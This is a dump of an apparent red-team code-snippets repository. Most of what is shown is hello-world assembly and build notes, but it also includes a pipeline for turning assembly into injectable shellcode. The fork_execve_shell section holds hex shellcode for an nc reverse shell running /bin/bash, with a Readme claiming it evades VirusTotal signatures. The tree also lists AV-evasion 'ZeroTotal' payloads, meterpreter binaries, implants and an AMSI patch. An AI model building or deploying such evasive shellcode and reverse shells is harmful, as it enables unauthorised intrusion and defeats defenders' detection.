reverse_shell.cpp │ ├── reverse_shell.exe │ ├── reverse_shell.obj │ └── shell.bin │ ├── shell.bin │ └── xorencrypt.py ├── LICENSE.md ├── Powershell ├── Readme.md └── amsi-patch.ps1 ├── Presentations ├── .placeholder └── Building Skynet_as_submitted.pptx ├── Python ├── PushingP │ ├── pushingpayloads.py │ └── pushingpayloadsv3.py ├── Readme.md ├── smuggler │ ├── OUT │ │ └── test.txt │ ├── Readme.md │ ├── in.txt │ ├── out.txt │ ├── smuggler.py │ └── test.txt └── utilities │ ├── Readme.md │ ├── aesencrypt.py │ ├── beautify.py │ └── xorencrypt.py ├── Readme.md └── Rust ├── CreateProcessA ├── Cargo.toml ├── Readme.md └── main.rs ├── Readme.md ├── peruns_fart ├── Cargo.toml ├── Readme.md └── main.rs ├── rust_implantv1 ├── implant_rust.exe └── main.rs ├── rust_implantv2 ├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implant.exe ├── rust_implantv3 ├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implantv3.exe ├── rust_implantv4 
├── Cargo.toml ├── Readme.md ├── main.rs └── rusty_implantv4.exe └── rusty_calc ├── Cargo.toml ├── Readme.md ├── main-original.rs └── main.rs /Assembly/Linx86-64/Readme.md: -------------------------------------------------------------------------------- 1 | Assembly programs and executables for Linux (x86_64) 2 | 3 | Developed on Kali Linux 4 | 5 | nasm -f elf64 -o PROGRAM_NAME.o PROGRAM_NAME.asm -l PROGRAM_NAME.assembly 6 | 7 | ld -g PROGRAM_NAME.o -o PROGRAM_NAME.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | section .rodata 3 | msg: db "Hello, world!", 10 4 | msglen: equ $ - msg 5 | a: db 10 6 | b: db 10 7 | c: db 10 8 | d: db 10 9 | e: db 10 10 | f: db 10 11 | g: db 10 12 | h: db 10 13 | i: db 10 14 | j: db 10 15 | 16 | section .text 17 | 18 | _start: 19 | push _start+0x7 20 | jmp _step 21 | mov rax, 0 22 | 23 | mov rax, 60 ;SYS EXIT 24 | mov rdi, 0 ; 25 | syscall ; 26 | 27 | _step: 28 | push _step_2 29 | mov al, [a] 30 | mov bl, [b] 31 | mov cl, [c] 32 | mov dl, [d] 33 | ret 34 | 35 | _step_2: 36 | push rax 37 | add rax, rbx 38 | add rax, rcx 39 | add rax, rdx 40 | mov rbx, rax 41 | add rsp, 0x8 42 | ret 43 | 44 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/call_program/call_me.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/Readme.md: -------------------------------------------------------------------------------- 1 | A more performant way of generating custom shellcode. Rather than clunky manual stack manipulations we're able to leverage NASM's ability to generate 2 | relative addresses to generate injectable shell code. 3 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.asm: -------------------------------------------------------------------------------- 1 | DEFAULT REL 2 | 3 | ; nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O0 4 | ; ld -m elf_x86_64 -o call_me call_me.o 5 | 6 | global _start 7 | 8 | section .text 9 | 10 | _start: 11 | 12 | mov rbp, rsp ; build stack 13 | sub rsp, 0x48 14 | 15 | mov rax, 
59 ; execve 16 | 17 | xor rcx, rcx ; clear stack 18 | push rcx 19 | 20 | lea rcx, [rel arg1] ; push arguments 21 | push rcx 22 | 23 | lea rcx, [rel arg0] ; push command 24 | push rcx 25 | 26 | lea rdi, [rel arg0] ;cmd 27 | lea rsi, [rsp] ;args 28 | xor rdx, rdx ;env 29 | syscall 30 | 31 | xor rdi, rdi 32 | mov rax, 60 33 | syscall 34 | 35 | arg0: db "/usr/bin/echo", 0 ; COMMAND GOES HERE 36 | arg1: db "PAYLOAD GOES HERE!", 10, 0, 0 ; ARGUMENTS GO HERE 37 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/call_me.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.so -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec4800000048b83b000000 2 | 000000004831c951488d0d3600000051 3 | 488d0d2000000051488d3d1800000048 4 | 8d34244831d20f054831ff48b83c0000 5 | 00000000000f052f7573722f62696e2f 6 | 6563686f005041594c4f414420474f45 7 | 532048455245210a0000 8 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system.bin 
-------------------------------------------------------------------------------- /Assembly/Linx86-64/execve/system_O3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system_O3.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/Readme.md: -------------------------------------------------------------------------------- 1 | This exercise develops a payload that calls fork(), then executes our standard /usr/bin/echo payload within the child process. 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/call_me.o: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec480000004831c95148b8 2 | 39000000000000000f05488d0d1e0000 3 | 00488d1d0c000000483d00000000480f 4 | 44cbffe14881c4480000004889ecc348 5 | b83b00000000000000488d0d27000000 6 | 51488d0d1100000051488d3d09000000 7 | 488d34244831d20f052f7573722f6269 8 | 6e2f6563686f005041594c4f41442047 9 | 4f45532048455245210a0000 10 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy into payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/system.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve/useful.txt: -------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/Readme.md: 
-------------------------------------------------------------------------------- 1 | This payload implements a fork followed by a nc reverse shell in the child process. 2 | 3 | 4 | ![image](https://user-images.githubusercontent.com/22229087/203710638-5a41b2f5-af9d-4dcf-9c97-6e23826893a5.png) 5 | 6 | 7 | The importance of our methodology is validated if we generate a standard msfvenom payload and upload it to VirusTotal. 8 | ![image](https://user-images.githubusercontent.com/22229087/203712181-d61dff5a-bd34-40a1-98ce-eb1d42d5bbfb.png) 9 | 10 | 11 | ![image](https://user-images.githubusercontent.com/22229087/203712257-54fe4bba-5d74-4185-9f35-f497aeec61e7.png) 12 | 13 | 14 | We can compare this with our custom system.bin file that we've crafted, and here are the results! Both results are static, signature-based scans of the file; they say nothing about behavioural detection, where the fork and the nc child process remain visible to process-execution monitoring. 15 | ![image](https://user-images.githubusercontent.com/22229087/203712643-15d4abd4-86bb-46b6-a470-82553d68c8cb.png) 16 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/beautify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "0xTriboulet" 4 | 5 | with open("dump.txt") as f: 6 | lines = f.readlines() 7 | last = lines[-1] 8 | print("unsigned char cmd[] = ") 9 | for line in lines: 10 | new_line = [] 11 | for i in range (0,len(line)-1,2): 12 | new_line.append("\\x"+line[i:i+2]) 13 | if line is last: 14 | print('"'+''.join(new_line)+'";') 15 | else: 16 | print('"'+''.join(new_line)+'"') 17 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/call_me: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me -------------------------------------------------------------------------------- 
/Assembly/Linx86-64/fork_execve_shell/call_me.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/dump.txt: -------------------------------------------------------------------------------- 1 | 4889e54881ec480000004831c9515151 2 | 5151595959595948b839000000000000 3 | 000f05488d0d13000000488d1d170000 4 | 00483d00000000480f44cbffe14881c4 5 | 480000004889ecc348b83b0000000000 6 | 0000488d0d5400000051488d0d420000 7 | 0051488d0d3000000051488d0d250000 8 | 0051488d0d1100000051488d3d090000 9 | 00488d34244831d20f052f7573722f62 10 | 696e2f6e63002d65002f62696e2f6261 11 | 7368003132372e302e302e3100393030 12 | 310000 13 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/how-to: -------------------------------------------------------------------------------- 1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3 2 | ld -m elf_x86_64 -N -s -o call_me call_me.o 3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt 4 | python beautify.py 5 | copy into payload section of system.c 6 | gcc -m64 -g system.c -o system.bin -O0 7 | ./system.bin 8 | 9 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/system.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/system.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/fork_execve_shell/useful.txt: 
-------------------------------------------------------------------------------- 1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200 2 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/hello_world/hello_world.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | mov rax, 1 ; write( 7 | mov rdi, 1 ; STDOUT_FILENO, 8 | mov rsi, msg ; "Hello, world!\n", 9 | mov rdx, msglen ; sizeof("Hello, world!\n") 10 | syscall ; ); 11 | 12 | mov rax, 60 ; exit( 13 | mov rdi, 0 ; EXIT_SUCCESS 14 | syscall ; ); 15 | 16 | section .rodata 17 | msg: db "Hello, world!", 10 18 | msglen: equ $ - msg 19 | -------------------------------------------------------------------------------- /Assembly/Linx86-64/print_args/print_args: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args -------------------------------------------------------------------------------- /Assembly/Linx86-64/print_args/print_args.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args.o -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.bin -------------------------------------------------------------------------------- /Assembly/Linx86-64/push_ret/test.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.o -------------------------------------------------------------------------------- /Assembly/Readme.md: -------------------------------------------------------------------------------- 1 | Assembly programs designed for educational purposes. Assembly is essential to understand for payload crafting, reverse engineering, and malware development. 2 | -------------------------------------------------------------------------------- /Assembly/Winx32/Readme.md: -------------------------------------------------------------------------------- 1 | Win32 programs written in assembly. 
2 | 3 | nasm -f win32 PROGRAM_NAME.asm -o PROGRAM_NAME.obj -l PROGRAM_NAME.assembly 4 | 5 | gcc PROGRAM_NAME.obj -o PROGRAM_NAME.exe 6 | -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.asm: -------------------------------------------------------------------------------- 1 | global _main ; declare main() method 2 | extern _printf ; link to external library 3 | segment .data 4 | message: db 'Hello world!', 0xA, 0 5 | message_2: db 'Hello again!!', 0xA, 0 6 | section .text 7 | _other_2: 8 | push message_2 9 | call _printf 10 | pop edi 11 | ret 12 | _other: 13 | push message 14 | call _printf 15 | pop edi 16 | ret 17 | _main: 18 | push _main+0xc 19 | mov edi, _other 20 | jmp edi 21 | push _main+0x18 22 | mov edi, _other_2 23 | jmp edi 24 | add esp, 4 25 | ret 26 | ; compile with nasm -f win32 hellow.asm 27 | ; link with gcc hellow.obj -o hellow.exe -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.exe -------------------------------------------------------------------------------- /Assembly/Winx32/hellow.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.obj -------------------------------------------------------------------------------- /Assembly/Winx64/Readme.md: -------------------------------------------------------------------------------- 1 | Win64 programs written in assembly. I prefer to use link for this architecture in order to leverage Windows function calls more easily. 
2 | 3 | nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly 4 | 5 | link /entry:start /subsystem:console hello_new.obj kernel32.lib 6 | -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.asm: -------------------------------------------------------------------------------- 1 | extern GetStdHandle 2 | extern WriteFile 3 | extern ExitProcess 4 | 5 | section .rodata 6 | 7 | msg db "Hello World!", 0x0d, 0x0a 8 | 9 | msg_len equ $-msg 10 | stdout_query equ -11 11 | status equ 0 12 | 13 | section .data 14 | 15 | stdout dw 0 16 | bytesWritten dw 0 17 | 18 | section .text 19 | 20 | global start 21 | 22 | start: 23 | mov rcx, stdout_query 24 | call GetStdHandle 25 | mov [rel stdout], rax 26 | 27 | mov rcx, [rel stdout] 28 | mov rdx, msg 29 | mov r8, msg_len 30 | mov r9, bytesWritten 31 | push qword 0 32 | call WriteFile 33 | 34 | mov rcx, status 35 | call ExitProcess -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello-win.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.obj -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.asm: -------------------------------------------------------------------------------- 1 | extern printf 2 | 3 | section .data 4 | msg db 'Hello World!' 
5 | section .text 6 | global main 7 | main: 8 | ;write your code here 9 | push rbp 10 | mov rbp, rsp 11 | 12 | mov rcx, msg 13 | sub rsp, 32 14 | call printf 15 | add rsp, 32 16 | 17 | leave 18 | ret -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.fas: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.fas -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/hello64.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.obj -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/make: -------------------------------------------------------------------------------- 1 | hello.exe: hello64.obj 2 | gcc -o hello64.exe -g hello64.obj 3 | hello.obj: hello64.asm 4 | nasm -f win64 -F cv8 hello64.asm -l hello64.lst -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/test.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_1/test64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test64.exe -------------------------------------------------------------------------------- 
/Assembly/Winx64/asm_2/hello.asm: -------------------------------------------------------------------------------- 1 | extern GetStdHandle 2 | extern WriteFile 3 | extern ExitProcess 4 | 5 | section .rodata 6 | 7 | msg db "Hello World!", 0x0d, 0x0a 8 | 9 | msg_len equ $-msg 10 | stdout_query equ -11 11 | status equ 0 12 | 13 | section .data 14 | 15 | stdout dw 0 16 | bytesWritten dw 0 17 | 18 | section .text 19 | 20 | global start 21 | 22 | start: 23 | mov rcx, stdout_query 24 | call GetStdHandle 25 | mov [rel stdout], rax 26 | 27 | mov rcx, [rel stdout] 28 | mov rdx, msg 29 | mov r8, msg_len 30 | mov r9, bytesWritten 31 | push qword 0 32 | call WriteFile 33 | 34 | mov rcx, status 35 | call ExitProcess 36 | ;nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly 37 | ;link /entry:start /subsystem:console hello_new.obj kernel32.lib" 38 | -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello_new.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.exe -------------------------------------------------------------------------------- /Assembly/Winx64/asm_2/hello_new.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.obj -------------------------------------------------------------------------------- 
/Assembly/Winx64/call_stack/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/call_stack/main_clean.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/call_stack/main_clean.exe -------------------------------------------------------------------------------- /Assembly/Winx64/call_stack/ramp.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | default rel 3 | bits 64 4 | 5 | global onRamp 6 | global offRamp 7 | 8 | ;nasm -f win64 ramp.asm -o ramp.o 9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx 10 | pop rax ; corrupt previous frame 11 | push rdx 12 | lea rax, [offRamp] ; get offRemp address 13 | push rax ; if payload returns, it'll return to our off ramp 14 | jmp rcx ; execute exec_mem 15 | 16 | offRamp: ; slide back into normal execution (dangerous!) 
17 | mov rax, [r13] ; get return_address 18 | jmp rax ; jump to return_address 19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/1.popcalc/popcalc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/1.popcalc/popcalc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/2.cmd/new_cmd.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/2.cmd/new_cmd.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/Readme.md: -------------------------------------------------------------------------------- 1 | 0-null byte WinExec payload with a changeable command and reworked for a changeable API. CreateProcessA is probably going to be the next API I try to work from this skeleton. 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/any_api.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.exe -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/4.changable_api/any_api.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.o -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/5.ZeroTotal/Readme.md: -------------------------------------------------------------------------------- 1 | Payloads designed to bypass all 
VirusTotal checks at the time of development. 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/6.meterpreter/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin -------------------------------------------------------------------------------- /Assembly/Winx64/payloads/Readme.md: -------------------------------------------------------------------------------- 1 | Payloads based on: 2 | 3 | https://www.exploit-db.com/exploits/49819 4 | by Bobby Cooke (boku) 5 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/CreateProcess.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": 
{}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "CreateProcess/1.0.0": { 10 | "runtime": { 11 | "CreateProcess.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "CreateProcess/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb -------------------------------------------------------------------------------- /C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 
